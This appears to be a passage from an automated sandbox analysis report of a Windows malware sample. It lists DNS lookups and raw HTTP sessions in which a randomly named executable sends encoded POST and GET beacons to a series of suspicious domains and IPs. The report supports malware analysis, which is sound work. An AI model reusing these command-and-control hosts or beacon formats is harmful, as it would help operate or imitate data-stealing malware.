                                                                                                                        Nov 21, 2024 16:24:11.344547987 CET53572521.1.1.1192.168.2.9

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Nov 21, 2024 16:20:33.246639967 CET192.168.2.91.1.1.10x5aStandard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:51.066520929 CET192.168.2.91.1.1.10x45bfStandard query (0)www.70kdd.topA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:06.644542933 CET192.168.2.91.1.1.10x20c6Standard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:21.695173025 CET192.168.2.91.1.1.10x777Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:22.703270912 CET192.168.2.91.1.1.10x777Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:37.316838980 CET192.168.2.91.1.1.10xbf17Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:38.312980890 CET192.168.2.91.1.1.10xbf17Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:52.883775949 CET192.168.2.91.1.1.10x11fbStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:53.890899897 CET192.168.2.91.1.1.10x11fbStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:08.847954035 CET192.168.2.91.1.1.10xef2bStandard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:25.489792109 CET192.168.2.91.1.1.10xc500Standard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:40.956830025 CET192.168.2.91.1.1.10x4262Standard query (0)www.ampsamkok88.shopA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:55.910799026 CET192.168.2.91.1.1.10x6db5Standard query (0)www.gogawithme.liveA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:10.738986015 CET192.168.2.91.1.1.10x9c4Standard query (0)www.54248711.xyzA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:25.802378893 CET192.168.2.91.1.1.10x28dcStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:26.797244072 CET192.168.2.91.1.1.10x28dcStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:41.435561895 CET192.168.2.91.1.1.10x3096Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:56.347815990 CET192.168.2.91.1.1.10xcd46Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:24:11.005058050 CET192.168.2.91.1.1.10xa454Standard query (0)www.3kw40881107247y.clickA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 21, 2024 16:20:04.644072056 CET1.1.1.1192.168.2.90xa059No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:04.644072056 CET1.1.1.1192.168.2.90xa059No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:34.209563017 CET1.1.1.1192.168.2.90x5aNo error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:34.209563017 CET1.1.1.1192.168.2.90x5aNo error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:51.854418993 CET1.1.1.1192.168.2.90x45bfNo error (0)www.70kdd.top70kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:20:51.854418993 CET1.1.1.1192.168.2.90x45bfNo error (0)70kdd.top38.47.232.124A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:07.401488066 CET1.1.1.1192.168.2.90x20c6No error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:22.827137947 CET1.1.1.1192.168.2.90x777No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:22.827137947 CET1.1.1.1192.168.2.90x777No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:22.839989901 CET1.1.1.1192.168.2.90x777No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:22.839989901 CET1.1.1.1192.168.2.90x777No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:38.364248991 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:38.364248991 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:38.450680017 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:38.450680017 CET1.1.1.1192.168.2.90xbf17No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:54.049530983 CET1.1.1.1192.168.2.90x11fbNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:21:54.049571991 CET1.1.1.1192.168.2.90x11fbNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:09.487808943 CET1.1.1.1192.168.2.90xef2bNo error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:26.237521887 CET1.1.1.1192.168.2.90xc500No error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:41.276529074 CET1.1.1.1192.168.2.90x4262No error (0)www.ampsamkok88.shop172.67.209.48A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:41.276529074 CET1.1.1.1192.168.2.90x4262No error (0)www.ampsamkok88.shop104.21.15.243A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:22:56.336155891 CET1.1.1.1192.168.2.90x6db5No error (0)www.gogawithme.live209.74.77.109A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:11.355724096 CET1.1.1.1192.168.2.90x9c4No error (0)www.54248711.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:26.924962044 CET1.1.1.1192.168.2.90x28dcNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:26.935272932 CET1.1.1.1192.168.2.90x28dcNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:41.896976948 CET1.1.1.1192.168.2.90x3096No error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:41.896976948 CET1.1.1.1192.168.2.90x3096No error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:56.670701981 CET1.1.1.1192.168.2.90xcd46No error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:56.670701981 CET1.1.1.1192.168.2.90xcd46No error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:24:11.344547987 CET1.1.1.1192.168.2.90xa454No error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:24:11.344547987 CET1.1.1.1192.168.2.90xa454No error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.rtpterbaruwaktu3.xyz
                                                                                                                        • www.70kdd.top
                                                                                                                        • www.acond-22-mvr.click
                                                                                                                        • www.smartcongress.net
                                                                                                                        • www.mrpokrovskii.pro
                                                                                                                        • www.ytsd88.top
                                                                                                                        • www.matteicapital.online
                                                                                                                        • www.llljjjiii.shop
                                                                                                                        • www.ampsamkok88.shop
                                                                                                                        • www.gogawithme.live
                                                                                                                        • www.54248711.xyz
                                                                                                                        • www.canadavinreport.site
                                                                                                                        • www.questmatch.pro
                                                                                                                        • www.bser101pp.buzz
                                                                                                                        • www.3kw40881107247y.click

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.949769103.21.221.87806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:20:34.346169949 CET346OUTGET /7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.rtpterbaruwaktu3.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:20:36.007711887 CET1033INHTTP/1.1 404 Not Found
                                                                                                                        Connection: close
                                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        pragma: no-cache
                                                                                                                        content-type: text/html
                                                                                                                        content-length: 796
                                                                                                                        date: Thu, 21 Nov 2024 15:20:35 GMT
                                                                                                                        server: LiteSpeed
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.94980838.47.232.124806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:20:51.994584084 CET583OUTPOST /klhq/ HTTP/1.1
                                                                                                                        Host: www.70kdd.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.70kdd.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.70kdd.top/klhq/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 64 36 46 59 78 71 48 66 61 36 51 33 72 73 6e 73 71 63 72 4f 74 6e 35 4a 4d 31 4b 35
                                                                                                                        Data Ascii: bBw=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2d6FYxqHfa6Q3rsnsqcrOtn5JM1K5
                                                                                                                        Nov 21, 2024 16:20:53.549953938 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:20:53 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e01838-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.94981438.47.232.124806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:20:54.657236099 CET607OUTPOST /klhq/ HTTP/1.1
                                                                                                                        Host: www.70kdd.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.70kdd.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.70kdd.top/klhq/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 77 56 54 6b 33 4d 31 6f 39 46 36 34 34 75 4b 6a 33 31 46 31 65 46 7a 54 6e 62 6d 7a 44 6d 68 42 32 70 63 6f 78 75 47 38 49 55 69 4e 33 65 72 33 78 6a 37 5a 34 68 30 34 77 55 39 4b 44 67 30 42 43 65 32 74 38 53 41 30 50 63 4a 32 41 6d 31 56 68 66 35 65 67 65 39 6f 36 61 38 41 5a 36 62 70 46 69 7a 55 34 4b 69 4d 42 37 2b 6e 74 51 49 47 71 58 47 76 4a 74 52 35 31 79 32 70 37 30 59 70 38 53 73 4e 62 79 37 75 69 56 34 77 35 75 4c 53 44 52 78 30 50 64 4b 47 4b 67 38 63 44 77 2b 73 5a 4c 6f 56 6b 38 55 41 3d 3d
                                                                                                                        Data Ascii: bBw=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4w5uLSDRx0PdKGKg8cDw+sZLoVk8UA==
                                                                                                                        Nov 21, 2024 16:20:56.192559958 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:20:55 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e01838-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.94982338.47.232.124806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:20:57.328237057 CET1620OUTPOST /klhq/ HTTP/1.1
                                                                                                                        Host: www.70kdd.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.70kdd.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.70kdd.top/klhq/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 45 53 70 70 43 79 75 36 53 64 72 69 6c 39 44 44 2f 44 35 53 66 68 56 48 44 70 70 74 6e 39 72 4f 77 47 72 56 39 78 50 57 53 55 65 30 78 46 73 2f 76 33 64 4a 48 31 34 70 38 6d 48 4b 66 7a 48 76 78 44 4f 41 49 6d 37 54 36 48 57 51 38 66 41 68 77 4a 36 31 70 34 57 6f 6c 4d 4e 55 68 44 76 30 2f 39 41 54 41 7a 53 6e 49 39 67 6a 37 54 42 6f 54 76 52 70 34 6c 6c 79 4a 79 50 48 4d 6a 73 47 59 48 53 42 47 69 6f 39 61 4c 56 51 33 73 71 71 73 4c 75 71 56 79 45 54 51 45 57 4f 6a 67 2f 6b 6b 34 77 4c [TRUNCATED]
                                                                                                                        Data Ascii: bBw=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+4VTRrM6rFF944uUz30F1eYzT/XmzP2hEypdL5uPtIUsN3egXxglp5p04gQ9KTg0BCe2vUSJAbcGWAh81hD9eg29rLv8AtqbdJizwUKxKV78Hs2LGqPGu1IR9cB2p/eYpESppCyu6Sdril9DD/D5SfhVHDpptn9rOwGrV9xPWSUe0xFs/v3dJH14p8mHKfzHvxDOAIm7T6HWQ8fAhwJ61p4WolMNUhDv0/9ATAzSnI9gj7TBoTvRp4llyJyPHMjsGYHSBGio9aLVQ3sqqsLuqVyETQEWOjg/kk4wLeVCvIPefDpUx8XxEo2lOCd+XN8KCs6gd54mZmQ3NC0rxX/bwBLbVrZxfKQoiMSrmr9mDsUVkffp4SDjbM4SXDCm9MjoyTX7O7kTnEQi3csKph3JlbpibodLtrpOm9gFmo+nP4V5D2KilNr9fReAw/zjciAjvhL4zz82TvU2CS2OFf43lPZU61YF3HKN6qQSoDqUECpl92/6afC/14LMoKCahvaY3liPOcqvZqYMFRzvYlXY1IZ9RsMytduFMhzW6eTov3/Vut5skvPeA3vgRXe9hPMacA/w+AFexO8ZqLDaoQpod0g+aP064tk251M/k3YOw21V+NwfurLU8VN9eG8VNKhUBCrrRCzZ5jl1kibCV6uUaalDMmXWDJuDhvUVzdRmlRRnvKaCvf1dw3vUN/VbqJ/BmlN82wAgdr4QfbgQpA3gr2s5xV9EUMHOdg6MAAIWJ1xnWs6B9V+IroqgtfY//H0/UwgFSZdqFUC8hdZ1DuTm7faaYTcLr5UTF1PtBSetJCTskToschpIjMlHRg+Myj2YAW2tEShu5tqWefQGKObmJV++EucSnyxYyrmn3IGHD4mWke/tgXSJ8E39SJTOXFCkeshWxE4qxz6qLmZwbdyNcyVYLU2E5zl5w+8UNpgiJ+KZZlqAC64vf0dopicNFYczqPfrbJ2 [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:20:58.946624041 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:20:58 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e01838-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.94983138.47.232.124806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:00.002948046 CET335OUTGET /klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.70kdd.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:21:01.633339882 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:01 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e01838-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.949848199.59.243.227806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:07.550414085 CET610OUTPOST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
